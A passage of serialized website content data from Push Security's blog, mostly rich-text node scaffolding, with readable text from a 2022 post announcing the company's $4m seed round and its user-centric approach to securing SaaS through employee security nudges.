marks":340478,"value":320705,"nodeType":173},{},[340479],{"type":1646},{"data":340481,"content":340482,"nodeType":178},{},[340483],{"data":340484,"marks":340485,"value":320712,"nodeType":173},{},[],{"data":340487,"content":340488,"nodeType":178},{},[340489],{"data":340490,"marks":340491,"value":320719,"nodeType":173},{},[],{"data":340493,"content":340494,"nodeType":178},{},[340495],{"data":340496,"marks":340497,"value":320726,"nodeType":173},{},[],{"data":340499,"content":340500,"nodeType":178},{},[340501,340504,340508,340511,340517],{"data":340502,"marks":340503,"value":320733,"nodeType":173},{},[],{"data":340505,"marks":340506,"value":221172,"nodeType":173},{},[340507],{"type":370},{"data":340509,"marks":340510,"value":320741,"nodeType":173},{},[],{"data":340512,"content":340513,"nodeType":186},{"uri":320744},[340514],{"data":340515,"marks":340516,"value":320749,"nodeType":173},{},[],{"data":340518,"marks":340519,"value":320753,"nodeType":173},{},[],{"data":340521,"content":340522,"nodeType":250},{},[340523,340532,340541,340550,340559,340568],{"data":340524,"content":340525,"nodeType":254},{},[340526],{"data":340527,"content":340528,"nodeType":178},{},[340529],{"data":340530,"marks":340531,"value":320766,"nodeType":173},{},[],{"data":340533,"content":340534,"nodeType":254},{},[340535],{"data":340536,"content":340537,"nodeType":178},{},[340538],{"data":340539,"marks":340540,"value":320776,"nodeType":173},{},[],{"data":340542,"content":340543,"nodeType":254},{},[340544],{"data":340545,"content":340546,"nodeType":178},{},[340547],{"data":340548,"marks":340549,"value":320786,"nodeType":173},{},[],{"data":340551,"content":340552,"nodeType":254},{},[340553],{"data":340554,"content":340555,"nodeType":178},{},[340556],{"data":340557,"marks":340558,"value":320796,"nodeType":173},{},[],{"data":340560,"content":340561,"nodeType":254},{},[340562],{"data":340563,"content":340564,"nodeType":178},{},[340565],{"data":340566,"marks":340567,"value":320806,"nodeType":173},{},[],{"data":340569,"content":340570,"nodeType":254},{},[340571],{"data":340572,"content":340573,"nodeType":178},{},[340574],{"data":340575,"marks":340576,"value":320816,"nodeType":173},{},[],{"data":340578,"content":340579,"nodeType":178},{},[340580],{"data":340581,"marks":340582,"value":320823,"nodeType":173},{},[],{"data":340584,"content":340585,"nodeType":178},{},[340586],{"data":340587,"marks":340588,"value":320830,"nodeType":173},{},[],{"data":340590,"content":340591,"nodeType":169},{},[340592],{"data":340593,"marks":340594,"value":309064,"nodeType":173},{},[],{"data":340596,"content":340597,"nodeType":178},{},[340598,340601,340605],{"data":340599,"marks":340600,"value":320843,"nodeType":173},{},[],{"data":340602,"marks":340603,"value":320848,"nodeType":173},{},[340604],{"type":1646},{"data":340606,"marks":340607,"value":320852,"nodeType":173},{},[],{"data":340609,"content":340610,"nodeType":235},{},[340611],{"data":340612,"marks":340613,"value":320859,"nodeType":173},{},[],{"data":340615,"content":340616,"nodeType":178},{},[340617,340620,340624],{"data":340618,"marks":340619,"value":320866,"nodeType":173},{},[],{"data":340621,"marks":340622,"value":320871,"nodeType":173},{},[340623],{"type":1646},{"data":340625,"marks":340626,"value":320875,"nodeType":173},{},[],{"data":340628,"content":340629,"nodeType":178},{},[340630],{"data":340631,"marks":340632,"value":320882,"nodeType":173},{},[],{"data":340634,"content":340635,"nodeType":178},{},[340636,340640],{"data":340637,"marks":340638,"value":320890,"nodeType":173},{},[340639],{"type":1646},{"data":340641,"marks":340642,"value":320894,"nodeType":173},{},[],{"data":340644,"content":340645,"nodeType":178},{},[340646],{"data":340647,"marks":340648,"value":320901,"nodeType":173},{},[],{"data":340650,"content":340651,"nodeType":178},{},[340652,340656,340659,340663],{"data":340653,"marks":340654,"value":320909,"nodeType":173},{},[340655],{"type":1646},{"data":340657,"marks":340658,"value":320913,"nodeType":173},{},[],{"data":340660,"marks":340661,"value":320918,"nodeType":173},{},[340662],{"type":1646},{"data":340664,"marks":340665,"value":10557,"nodeType":173},{},[],{"data":340667,"content":340670,"nodeType":312},{"target":340668},{"sys":340669},{"id":320926,"type":317,"linkType":318},[],{"data":340672,"content":340673,"nodeType":178},{},[340674,340677,340683],{"data":340675,"marks":340676,"value":320934,"nodeType":173},{},[],{"data":340678,"content":340679,"nodeType":186},{"uri":320744},[340680],{"data":340681,"marks":340682,"value":320941,"nodeType":173},{},[],{"data":340684,"marks":340685,"value":1477,"nodeType":173},{},[],{"data":340687,"content":340688,"nodeType":178},{},[340689,340692,340698,340701,340707],{"data":340690,"marks":340691,"value":320951,"nodeType":173},{},[],{"data":340693,"content":340694,"nodeType":186},{"uri":117883},[340695],{"data":340696,"marks":340697,"value":320958,"nodeType":173},{},[],{"data":340699,"marks":340700,"value":1464,"nodeType":173},{},[],{"data":340702,"content":340703,"nodeType":186},{"uri":117869},[340704],{"data":340705,"marks":340706,"value":117876,"nodeType":173},{},[],{"data":340708,"marks":340709,"value":320971,"nodeType":173},{},[],[320974,320975,320976,320977,320978],{"items":340712},[340713,340715],{"sys":340714,"name":274157},{"id":274156},{"sys":340716,"name":26137},{"id":26136},{"items":340718},[340719],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":340720},{"url":13981},{"items":340722},[340723],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":340724},{"url":13981},"content:blog:how-to-find-the-right-saas-security-solution-for-your-organization.json","blog/how-to-find-the-right-saas-security-solution-for-your-organization.json","blog/how-to-find-the-right-saas-security-solution-for-your-organization",{"_path":340729,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":340730,"ogImage":118,"summary":340733,"title":340744,"subtitle":118,"metaTitle":340745,"synopsis":340746,"hashTags":340747,"publishedDate":340752,"slug":340753,"tagsCollection":340754,"content":340758,"relatedBlogPostsCollection":341037,"authorsCollection":341228,"_id":341232,"_type":5439,"_source":5440,"_file":341233,"_stem":341234,"_extension":5439},"/blog/what-weve-been-up-to-with-our-seed-funding",{"id":340731,"publishedAt":340732},"Wh59zDErDeWrjx6FkoUSv","2024-09-12T08:43:59.053Z",{"json":340734},{"data":340735,"content":340736,"nodeType":165},{},[340737],{"data":340738,"content":340739,"nodeType":178},{},[340740],{"data":340741,"marks":340742,"value":340743,"nodeType":173},{},[],"Yesterday we announced our $4m series seed funding round to level-up the user-centric security movement and secure SaaS at scale. In this post, we explain what Push is all about.","What we’ve been up to with our seed funding: a peek behind the curtain","What we’ve built with our seed funding round","Yesterday, we announced our official launch and what Push Security is all about following our $4m series seed.",[340748,340749,340750,340751],"UserCentricSecurity","UserPoweredSecurity","SaaSsecurity","startup","2022-07-20T00:00:00.000Z","what-weve-been-up-to-with-our-seed-funding",{"items":340755},[340756],{"sys":340757,"name":117242},{"id":117241},{"json":340759,"links":341030},{"data":340760,"content":340761,"nodeType":165},{},[340762,340782,340888,340895,340907,340914,340921,340931,340946,340953,340972,340979,340986,341004],{"data":340763,"content":340764,"nodeType":178},{},[340765,340769,340778],{"data":340766,"marks":340767,"value":340768,"nodeType":173},{},[],"A little over 12-months ago, we ",{"data":340770,"content":340772,"nodeType":186},{"uri":340771},"https://pushsecurity.com/blog/push-securitys-early-access-preview-is-live/",[340773],{"data":340774,"marks":340775,"value":340777,"nodeType":173},{},[340776],{"type":194},"announced",{"data":340779,"marks":340780,"value":340781,"nodeType":173},{},[]," that we’d soft-launched Push and opened the doors to our platform as part of an early access preview. During the preview, we worked closely with security professionals around the world from organizations of all shapes and sizes. We listened to feedback, to ideas, and we learned how we could hone the product to solve the most meaningful problems in a way that was accessible not just to large enterprises, but to smaller companies too. ",{"data":340783,"content":340784,"nodeType":178},{},[340785,340789,340797,340801,340810,340814,340823,340827,340836,340840,340849,340853,340862,340866,340875,340878,340885],{"data":340786,"marks":340787,"value":340788,"nodeType":173},{},[],"In case you missed it, yesterday we announced Push Security’s ",{"data":340790,"content":340792,"nodeType":186},{"uri":340791},"https://techcrunch.com/2022/07/19/push-security-launches-to-make-saas-sprawl-and-shadow-it-safer/",[340793],{"data":340794,"marks":340795,"value":340796,"nodeType":173},{},[],"official launch",{"data":340798,"marks":340799,"value":340800,"nodeType":173},{},[],", fueled by a $4m seed funding led by ",{"data":340802,"content":340804,"nodeType":186},{"uri":340803},"https://twitter.com/DecibelVC",[340805],{"data":340806,"marks":340807,"value":340809,"nodeType":173},{},[340808],{"type":194},"@DecibelVC ",{"data":340811,"marks":340812,"value":340813,"nodeType":173},{},[],"and backed by industry legends Jon Oberheide (",{"data":340815,"content":340817,"nodeType":186},{"uri":340816},"https://twitter.com/jonoberheide",[340818],{"data":340819,"marks":340820,"value":340822,"nodeType":173},{},[340821],{"type":194},"@jonoberheide",{"data":340824,"marks":340825,"value":340826,"nodeType":173},{},[],"), Ollie Whitehouse (",{"data":340828,"content":340830,"nodeType":186},{"uri":340829},"https://twitter.com/ollieatnccgroup",[340831],{"data":340832,"marks":340833,"value":340835,"nodeType":173},{},[340834],{"type":194},"@ollieatnccgroup",{"data":340837,"marks":340838,"value":340839,"nodeType":173},{},[],"), Haroon Meer (",{"data":340841,"content":340843,"nodeType":186},{"uri":340842},"https://twitter.com/haroonmeer",[340844],{"data":340845,"marks":340846,"value":340848,"nodeType":173},{},[340847],{"type":194},"@haroon",{"data":340850,"marks":340851,"value":340852,"nodeType":173},{},[],"), John Viega (",{"data":340854,"content":340856,"nodeType":186},{"uri":340855},"https://twitter.com/viega",[340857],{"data":340858,"marks":340859,"value":340861,"nodeType":173},{},[340860],{"type":194},"@viega",{"data":340863,"marks":340864,"value":340865,"nodeType":173},{},[],"), ",{"data":340867,"content":340869,"nodeType":186},{"uri":340868},"https://www.linkedin.com/in/iantshaw/",[340870],{"data":340871,"marks":340872,"value":340874,"nodeType":173},{},[340873],{"type":194},"Ian Shaw",{"data":340876,"marks":340877,"value":9534,"nodeType":173},{},[],{"data":340879,"content":340880,"nodeType":186},{"uri":323636},[340881],{"data":340882,"marks":340883,"value":340884,"nodeType":173},{},[],"many others",{"data":340886,"marks":340887,"value":197,"nodeType":173},{},[],{"data":340889,"content":340890,"nodeType":178},{},[340891],{"data":340892,"marks":340893,"value":340894,"nodeType":173},{},[],"A big thank you to everyone who took part in the preview, to everyone who’s backing us, and to the amazing team at Push for making all of this happen.",{"data":340896,"content":340897,"nodeType":178},{},[340898,340902],{"data":340899,"marks":340900,"value":340901,"nodeType":173},{},[],"Now that we’re loaded up with funding, even more brain-power and a shiny new product release - we’re excited to share what we’ve been building at Push. ",{"data":340903,"marks":340904,"value":340906,"nodeType":173},{},[340905],{"type":370},"What’s Push all about anyway?",{"data":340908,"content":340909,"nodeType":178},{},[340910],{"data":340911,"marks":340912,"value":340913,"nodeType":173},{},[],"Push provides a super scalable way to secure SaaS, by equipping employees to join the fight against attackers and improve their own security. We provide them with just-in-time guidance to nudge and help them make good security decisions as they adopt and use SaaS. ",{"data":340915,"content":340916,"nodeType":178},{},[340917],{"data":340918,"marks":340919,"value":340920,"nodeType":173},{},[],"For example, we might encourage them to take actions like enabling MFA, setting strong passwords that haven’t been previously exposed, and removing third-party integrations that have privileged access to their personal data but are no longer being used.",{"data":340922,"content":340923,"nodeType":3769},{},[340924],{"data":340925,"content":340926,"nodeType":178},{},[340927],{"data":340928,"marks":340929,"value":340930,"nodeType":173},{},[],"A user-centric approach to security is a ridiculously scalable way to secure SaaS.",{"data":340932,"content":340933,"nodeType":178},{},[340934,340938,340943],{"data":340935,"marks":340936,"value":340937,"nodeType":173},{},[],"This is all part of a wider and quickly emerging industry trend that’s all the rage right now: using a user-centric approach to security. And the big driving force behind this trend is ",{"data":340939,"marks":340940,"value":340942,"nodeType":173},{},[340941],{"type":370},"decentralization",{"data":340944,"marks":340945,"value":1477,"nodeType":173},{},[],{"data":340947,"content":340948,"nodeType":178},{},[340949],{"data":340950,"marks":340951,"value":340952,"nodeType":173},{},[],"Modern companies are increasingly decentralized. Rather than having a central company network housing a number of work services, employees are working from home, bringing their own device, and signing up freely to the SaaS services they need.",{"data":340954,"content":340955,"nodeType":178},{},[340956,340960,340968],{"data":340957,"marks":340958,"value":340959,"nodeType":173},{},[],"We’ve now reached a tipping point whereby more SaaS platforms are adopted and owned by employees than centrally by IT. In fact, ",{"data":340961,"content":340962,"nodeType":186},{"uri":296916},[340963],{"data":340964,"marks":340965,"value":340967,"nodeType":173},{},[340966],{"type":194},"G2 reported",{"data":340969,"marks":340970,"value":340971,"nodeType":173},{},[]," that “80% of workers admit to using SaaS applications at work without getting approval from IT.”",{"data":340973,"content":340974,"nodeType":178},{},[340975],{"data":340976,"marks":340977,"value":340978,"nodeType":173},{},[],"This shift has put employees in control of work services and where company data goes. It also gives an attacker an opportunity to quickly check across all popular SaaS services for weak user accounts and compromise company data.",{"data":340980,"content":340981,"nodeType":178},{},[340982],{"data":340983,"marks":340984,"value":340985,"nodeType":173},{},[],"If the company perimeter has now become ever expanding and under the security team's radar, the next logical shift is to focus on the employee and ensure that they are taking the right steps to protect that company data.",{"data":340987,"content":340988,"nodeType":178},{},[340989,340993,341001],{"data":340990,"marks":340991,"value":340992,"nodeType":173},{},[],"As an industry, we’ve barely scratched the surface with what’s possible. Push is here to level up the user-centric movement and we’re excited to see how far we can take it. Read more about our approach ",{"data":340994,"content":340997,"nodeType":1698},{"target":340995},{"sys":340996},{"id":323830,"type":317,"linkType":318},[340998],{"data":340999,"marks":341000,"value":28052,"nodeType":173},{},[],{"data":341002,"marks":341003,"value":1477,"nodeType":173},{},[],{"data":341005,"content":341006,"nodeType":178},{},[341007,341011,341017,341020,341026],{"data":341008,"marks":341009,"value":341010,"nodeType":173},{},[],"Watch this space on ",{"data":341012,"content":341013,"nodeType":186},{"uri":117883},[341014],{"data":341015,"marks":341016,"value":271600,"nodeType":173},{},[],{"data":341018,"marks":341019,"value":1464,"nodeType":173},{},[],{"data":341021,"content":341022,"nodeType":186},{"uri":117869},[341023],{"data":341024,"marks":341025,"value":117876,"nodeType":173},{},[],{"data":341027,"marks":341028,"value":341029,"nodeType":173},{},[],", with lots of exciting developments to come.",{"entries":341031},{"block":341032,"inline":341033,"hyperlink":341034},[],[],[341035],{"sys":341036,"__typename":1528,"title":324173,"slug":324175},{"id":323830},{"items":341038},[341039],{"__typename":1528,"sys":341040,"content":341041,"title":323816,"synopsis":323817,"hashTags":118,"publishedDate":323818,"slug":323819,"tagsCollection":341220,"authorsCollection":341224},{"id":323060},{"json":341042},{"data":341043,"content":341044,"nodeType":165},{},[341045,341071,341077,341083,341089,341095,341101,341107,341123,341130,341136,341162,341169,341185,341192,341198,341214],{"data":341046,"content":341047,"nodeType":178},{},[341048,341051,341058,341061,341068],{"data":341049,"marks":341050,"value":323621,"nodeType":173},{},[],{"data":341052,"content":341053,"nodeType":186},{"uri":323624},[341054],{"data":341055,"marks":341056,"value":117772,"nodeType":173},{},[341057],{"type":194},{"data":341059,"marks":341060,"value":323633,"nodeType":173},{},[],{"data":341062,"content":341063,"nodeType":186},{"uri":323636},[341064],{"data":341065,"marks":341066,"value":323642,"nodeType":173},{},[341067],{"type":194},{"data":341069,"marks":341070,"value":323646,"nodeType":173},{},[],{"data":341072,"content":341073,"nodeType":178},{},[341074],{"data":341075,"marks":341076,"value":323653,"nodeType":173},{},[],{"data":341078,"content":341079,"nodeType":178},{},[341080],{"data":341081,"marks":341082,"value":323660,"nodeType":173},{},[],{"data":341084,"content":341085,"nodeType":178},{},[341086],{"data":341087,"marks":341088,"value":323667,"nodeType":173},{},[],{"data":341090,"content":341091,"nodeType":178},{},[341092],{"data":341093,"marks":341094,"value":323674,"nodeType":173},{},[],{"data":341096,"content":341097,"nodeType":178},{},[341098],{"data":341099,"marks":341100,"value":323681,"nodeType":173},{},[],{"data":341102,"content":341103,"nodeType":178},{},[341104],{"data":341105,"marks":341106,"value":323688,"nodeType":173},{},[],{"data":341108,"content":341109,"nodeType":178},{},[341110,341113,341120],{"data":341111,"marks":341112,"value":323695,"nodeType":173},{},[],{"data":341114,"content":341115,"nodeType":186},{"uri":97117},[341116],{"data":341117,"marks":341118,"value":323703,"nodeType":173},{},[341119],{"type":194},{"data":341121,"marks":341122,"value":323707,"nodeType":173},{},[],{"data":341124,"content":341125,"nodeType":178},{},[341126],{"data":341127,"marks":341128,"value":15112,"nodeType":173},{},[341129],{"type":370},{"data":341131,"content":341132,"nodeType":178},{},[341133],{"data":341134,"marks":341135,"value":323721,"nodeType":173},{},[],{"data":341137,"content":341138,"nodeType":178},{},[341139,341142,341149,341152,341159],{"data":341140,"marks":341141,"value":323728,"nodeType":173},{},[],{"data":341143,"content":341144,"nodeType":186},{"uri":97117},[341145],{"data":341146,"marks":341147,"value":323703,"nodeType":173},{},[341148],{"type":194},{"data":341150,"marks":341151,"value":323739,"nodeType":173},{},[],{"data":341153,"content":341154,"nodeType":186},{"uri":117883},[341155],{"data":341156,"marks":341157,"value":323747,"nodeType":173},{},[341158],{"type":194},{"data":341160,"marks":341161,"value":197,"nodeType":173},{},[],{"data":341163,"content":341164,"nodeType":178},{},[341165],{"data":341166,"marks":341167,"value":323758,"nodeType":173},{},[341168],{"type":370},{"data":341170,"content":341171,"nodeType":178},{},[341172,341175,341182],{"data":341173,"marks":341174,"value":37,"nodeType":173},{},[],{"data":341176,"content":341177,"nodeType":186},{"uri":323767},[341178],{"data":341179,"marks":341180,"value":117772,"nodeType":173},{},[341181],{"type":194},{"data":341183,"marks":341184,"value":323776,"nodeType":173},{},[],{"data":341186,"content":341187,"nodeType":178},{},[341188],{"data":341189,"marks":341190,"value":323784,"nodeType":173},{},[341191],{"type":370},{"data":341193,"content":341194,"nodeType":178},{},[341195],{"data":341196,"marks":341197,"value":323791,"nodeType":173},{},[],{"data":341199,"content":341200,"nodeType":178},{},[341201,341204,341211],{"data":341202,"marks":341203,"value":37,"nodeType":173},{},[],{"data":341205,"content":341206,"nodeType":186},{"uri":323800},[341207],{"data":341208,"marks":341209,"value":323806,"nodeType":173},{},[341210],{"type":194},{"data":341212,"marks":341213,"value":37,"nodeType":173},{},[],{"data":341215,"content":341216,"nodeType":178},{},[341217],{"data":341218,"marks":341219,"value":13836,"nodeType":173},{},[],{"items":341221},[341222],{"sys":341223,"name":117242},{"id":117241},{"items":341225},[341226],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":341227},{"url":282559},{"items":341229},[341230],{"fullName":117936,"firstName":117937,"jobTitle":117938,"profilePicture":341231},{"url":117940},"content:blog:what-weve-been-up-to-with-our-seed-funding.json","blog/what-weve-been-up-to-with-our-seed-funding.json","blog/what-weve-been-up-to-with-our-seed-funding",{"_path":341236,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":341237,"ogImage":118,"summary":341239,"title":324173,"subtitle":118,"metaTitle":341250,"synopsis":324174,"hashTags":118,"publishedDate":323818,"slug":324175,"tagsCollection":341251,"relatedBlogPostsCollection":341255,"authorsCollection":341752,"content":341756,"_id":342061,"_type":5439,"_source":5440,"_file":342062,"_stem":342063,"_extension":5439},"/blog/building-a-culture-of-trust-to-secure-saas-together",{"id":323830,"publishedAt":341238},"2023-08-21T16:47:19.163Z",{"json":341240},{"data":341241,"content":341242,"nodeType":165},{},[341243],{"data":341244,"content":341245,"nodeType":178},{},[341246],{"data":341247,"marks":341248,"value":341249,"nodeType":173},{},[],"We’re excited to announce our $4M seed round, led by Decibel. In this blog, we’re going to share why we started Push, our plans for the future, and how we’re building technology that allows organizations to allow employees to freely and securely adopt and use SaaS.","Push Security's 4M seed round",{"items":341252},[341253],{"sys":341254,"name":117242},{"id":117241},{"items":341256},[341257,341446],{"__typename":1528,"sys":341258,"content":341259,"title":323816,"synopsis":323817,"hashTags":118,"publishedDate":323818,"slug":323819,"tagsCollection":341438,"authorsCollection":341442},{"id":323060},{"json":341260},{"data":341261,"content":341262,"nodeType":165},{},[341263,341289,341295,341301,341307,341313,341319,341325,341341,341348,341354,341380,341387,341403,341410,341416,341432],{"data":341264,"content":341265,"nodeType":178},{},[341266,341269,341276,341279,341286],{"data":341267,"marks":341268,"value":323621,"nodeType":173},{},[],{"data":341270,"content":341271,"nodeType":186},{"uri":323624},[341272],{"data":341273,"marks":341274,"value":117772,"nodeType":173},{},[341275],{"type":194},{"data":341277,"marks":341278,"value":323633,"nodeType":173},{},[],{"data":341280,"content":341281,"nodeType":186},{"uri":323636},[341282],{"data":341283,"marks":341284,"value":323642,"nodeType":173},{},[341285],{"type":194},{"data":341287,"marks":341288,"value":323646,"nodeType":173},{},[],{"data":341290,"content":341291,"nodeType":178},{},[341292],{"data":341293,"marks":341294,"value":323653,"nodeType":173},{},[],{"data":341296,"content":341297,"nodeType":178},{},[341298],{"data":341299,"marks":341300,"value":323660,"nodeType":173},{},[],{"data":341302,"content":341303,"nodeType":178},{},[341304],{"data":341305,"marks":341306,"value":323667,"nodeType":173},{},[],{"data":341308,"content":341309,"nodeType":178},{},[341310],{"data":341311,"marks":341312,"value":323674,"nodeType":173},{},[],{"data":341314,"content":341315,"nodeType":178},{},[341316],{"data":341317,"marks":341318,"value":323681,"nodeType":173},{},[],{"data":341320,"content":341321,"nodeType":178},{},[341322],{"data":341323,"marks":341324,"value":323688,"nodeType":173},{},[],{"data":341326,"content":341327,"nodeType":178},{},[341328,341331,341338],{"data":341329,"marks":341330,"value":323695,"nodeType":173},{},[],{"data":341332,"content":341333,"nodeType":186},{"uri":97117},[341334],{"data":341335,"marks":341336,"value":323703,"nodeType":173},{},[341337],{"type":194},{"data":341339,"marks":341340,"value":323707,"nodeType":173},{},[],{"data":341342,"content":341343,"nodeType":178},{},[341344],{"data":341345,"marks":341346,"value":15112,"nodeType":173},{},[341347],{"type":370},{"data":341349,"content":341350,"nodeType":178},{},[341351],{"data":341352,"marks":341353,"value":323721,"nodeType":173},{},[],{"data":341355,"content":341356,"nodeType":178},{},[341357,341360,341367,341370,341377],{"data":341358,"marks":341359,"value":323728,"nodeType":173},{},[],{"data":341361,"content":341362,"nodeType":186},{"uri":97117},[341363],{"data":341364,"marks":341365,"value":323703,"nodeType":173},{},[341366],{"type":194},{"data":341368,"marks":341369,"value":323739,"nodeType":173},{},[],{"data":341371,"content":341372,"nodeType":186},{"uri":117883},[341373],{"data":341374,"marks":341375,"value":323747,"nodeType":173},{},[341376],{"type":194},{"data":341378,"marks":341379,"value":197,"nodeType":173},{},[],{"data":341381,"content":341382,"nodeType":178},{},[341383],{"data":341384,"marks":341385,"value":323758,"nodeType":173},{},[341386],{"type":370},{"data":341388,"content":341389,"nodeType":178},{},[341390,341393,341400],{"data":341391,"marks":341392,"value":37,"nodeType":173},{},[],{"data":341394,"content":341395,"nodeType":186},{"uri":323767},[341396],{"data":341397,"marks":341398,"value":117772,"nodeType":173},{},[341399],{"type":194},{"data":341401,"marks":341402,"value":323776,"nodeType":173},{},[],{"data":341404,"content":341405,"nodeType":178},{},[341406],{"data":341407,"marks":341408,"value":323784,"nodeType":173},{},[341409],{"type":370},{"data":341411,"content":341412,"nodeType":178},{},[341413],{"data":341414,"marks":341415,"value":323791,"nodeType":173},{},[],{"data":341417,"content":341418,"nodeType":178},{},[341419,341422,341429],{"data":341420,"marks":341421,"value":37,"nodeType":173},{},[],{"data":341423,"content":341424,"nodeType":186},{"uri":323800},[341425],{"data":341426,"marks":341427,"value":323806,"nodeType":173},{},[341428],{"type":194},{"data":341430,"marks":341431,"value":37,"nodeType":173},{},[],{"data":341433,"content":341434,"nodeType":178},{},[341435],{"data":341436,"marks":341437,"value":13836,"nodeType":173},{},[],{"items":341439},[341440],{"sys":341441,"name":117242},{"id":117241},{"items":341443},[341444],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":341445},{"url":282559},{"__typename":1528,"sys":341447,"content":341448,"title":332253,"synopsis":332254,"hashTags":118,"publishedDate":332255,"slug":332256,"tagsCollection":341744,"authorsCollection":341748},{"id":331914},{"json":341449},{"data":341450,"content":341451,"nodeType":165},{},[341452,341458,341488,341494,341501,341516,341521,341534,341539,341545,341550,341556,341562,341577,341585,341591,341597,341634,341639,341645,341660,341666,341672,341678,341684,341690,341696,341702,341708,341713,341737],{"data":341453,"content":341454,"nodeType":178},{},[341455],{"data":341456,"marks":341457,"value":331925,"nodeType":173},{},[],{"data":341459,"content":341460,"nodeType":250},{},[341461,341470,341479],{"data":341462,"content":341463,"nodeType":254},{},[341464],{"data":341465,"content":341466,"nodeType":178},{},[341467],{"data":341468,"marks":341469,"value":331938,"nodeType":173},{},[],{"data":341471,"content":341472,"nodeType":254},{},[341473],{"data":341474,"content":341475,"nodeType":178},{},[341476],{"data":341477,"marks":341478,"value":331948,"nodeType":173},{},[],{"data":341480,"content":341481,"nodeType":254},{},[341482],{"data":341483,"content":341484,"nodeType":178},{},[341485],{"data":341486,"marks":341487,"value":331958,"nodeType":173},{},[],{"data":341489,"content":341490,"nodeType":169},{},[341491],{"data":341492,"marks":341493,"value":331938,"nodeType":173},{},[],{"data":341495,"content":341496,"nodeType":178},{},[341497],{"data":341498,"marks":341499,"value":331972,"nodeType":173},{},[341500],{"type":1646},{"data":341502,"content":341503,"nodeType":178},{},[341504,341507,341513],{"data":341505,"marks":341506,"value":331979,"nodeType":173},{},[],{"data":341508,"content":341509,"nodeType":186},{"uri":285403},[341510],{"data":341511,"marks":341512,"value":331986,"nodeType":173},{},[],{"data":341514,"marks":341515,"value":39946,"nodeType":173},{},[],{"data":341517,"content":341520,"nodeType":312},{"target":341518},{"sys":341519},{"id":331994,"type":317,"linkType":318},[],{"data":341522,"content":341523,"nodeType":178},{},[341524,341527,341531],{"data":341525,"marks":341526,"value":332002,"nodeType":173},{},[],{"data":341528,"marks":341529,"value":332007,"nodeType":173},{},[341530],{"type":1646},{"data":341532,"marks":341533,"value":332011,"nodeType":173},{},[],{"data":341535,"content":341538,"nodeType":312},{"target":341536},{"sys":341537},{"id":332016,"type":317,"linkType":318},[],{"data":341540,"content":341541,"nodeType":178},{},[341542],{"data":341543,"marks":341544,"value":332024,"nodeType":173},{},[],{"data":341546,"content":341549,"nodeType":312},{"target":341547},{"sys":341548},{"id":332029,"type":317,"linkType":318},[],{"data":341551,"content":341552,"nodeType":178},{},[341553],{"data":341554,"marks":341555,"value":332037,"nodeType":173},{},[],{"data":341557,"content":341558,"nodeType":178},{},[341559],{"data":341560,"marks":341561,"value":332044,"nodeType":173},{},[],{"data":341563,"content":341564,"nodeType":178},{},[341565,341568,341574],{"data":341566,"marks":341567,"value":37,"nodeType":173},{},[],{"data":341569,"content":341570,"nodeType":186},{"uri":332053},[341571],{"data":341572,"marks":341573,"value":332058,"nodeType":173},{},[],{"data":341575,"marks":341576,"value":37,"nodeType":173},{},[],{"data":341578,"content":341581,"nodeType":169},{"target":341579},{"sys":341580},{"id":332066,"type":317,"linkType":318},[341582],{"data":341583,"marks":341584,"value":331948,"nodeType":173},{},[],{"data":341586,"content":341587,"nodeType":178},{},[341588],{"data":341589,"marks":341590,"value":332077,"nodeType":173},{},[],{"data":341592,"content":341593,"nodeType":178},{},[341594],{"data":341595,"marks":341596,"value":332084,"nodeType":173},{},[],{"data":341598,"content":341599,"nodeType":250},{},[341600,341616,341625],{"data":341601,"content":341602,"nodeType":254},{},[341603],{"data":341604,"content":341605,"nodeType":178},{},[341606,341609,341613],{"data":341607,"marks":341608,"value":332097,"nodeType":173},{},[],{"data":341610,"marks":341611,"value":332102,"nodeType":173},{},[341612],{"type":1646},{"data":341614,"marks":341615,"value":332106,"nodeType":173},{},[],{"data":341617,"content":341618,"nodeType":254},{},[341619],{"data":341620,"content":341621,"nodeType":178},{},[341622],{"data":341623,"marks":341624,"value":332116,"nodeType":173},{},[],{"data":341626,"content":341627,"nodeType":254},{},[341628],{"data":341629,"content":341630,"nodeType":178},{},[341631],{"data":341632,"marks":341633,"value":332126,"nodeType":173},{},[],{"data":341635,"content":341638,"nodeType":312},{"target":341636},{"sys":341637},{"id":332131,"type":317,"linkType":318},[],{"data":341640,"content":341641,"nodeType":178},{},[341642],{"data":341643,"marks":341644,"value":37,"nodeType":173},{},[],{"data":341646,"content":341647,"nodeType":178},{},[341648,341651,341657],{"data":341649,"marks":341650,"value":37,"nodeType":173},{},[],{"data":341652,"content":341653,"nodeType":186},{"uri":332147},[341654],{"data":341655,"marks":341656,"value":332058,"nodeType":173},{},[],{"data":341658,"marks":341659,"value":37,"nodeType":173},{},[],{"data":341661,"content":341662,"nodeType":169},{},[341663],{"data":341664,"marks":341665,"value":331958,"nodeType":173},{},[],{"data":341667,"content":341668,"nodeType":178},{},[341669],{"data":341670,"marks":341671,"value":332167,"nodeType":173},{},[],{"data":341673,"content":341674,"nodeType":178},{},[341675],{"data":341676,"marks":341677,"value":332174,"nodeType":173},{},[],{"data":341679,"content":341680,"nodeType":178},{},[341681],{"data":341682,"marks":341683,"value":332181,"nodeType":173},{},[],{"data":341685,"content":341686,"nodeType":178},{},[341687],{"data":341688,"marks":341689,"value":332188,"nodeType":173},{},[],{"data":341691,"content":341692,"nodeType":178},{},[341693],{"data":341694,"marks":341695,"value":332195,"nodeType":173},{},[],{"data":341697,"content":341698,"nodeType":178},{},[341699],{"data":341700,"marks":341701,"value":332202,"nodeType":173},{},[],{"data":341703,"content":341704,"nodeType":178},{},[341705],{"data":341706,"marks":341707,"value":332209,"nodeType":173},{},[],{"data":341709,"content":341712,"nodeType":312},{"target":341710},{"sys":341711},{"id":332214,"type":317,"linkType":318},[],{"data":341714,"content":341715,"nodeType":178},{},[341716,341719,341725,341728,341734],{"data":341717,"marks":341718,"value":332222,"nodeType":173},{},[],{"data":341720,"content":341721,"nodeType":186},{"uri":332225},[341722],{"data":341723,"marks":341724,"value":332230,"nodeType":173},{},[],{"data":341726,"marks":341727,"value":332234,"nodeType":173},{},[],{"data":341729,"content":341730,"nodeType":186},{"uri":332237},[341731],{"data":341732,"marks":341733,"value":323703,"nodeType":173},{},[],{"data":341735,"marks":341736,"value":332245,"nodeType":173},{},[],{"data":341738,"content":341739,"nodeType":178},{},[341740]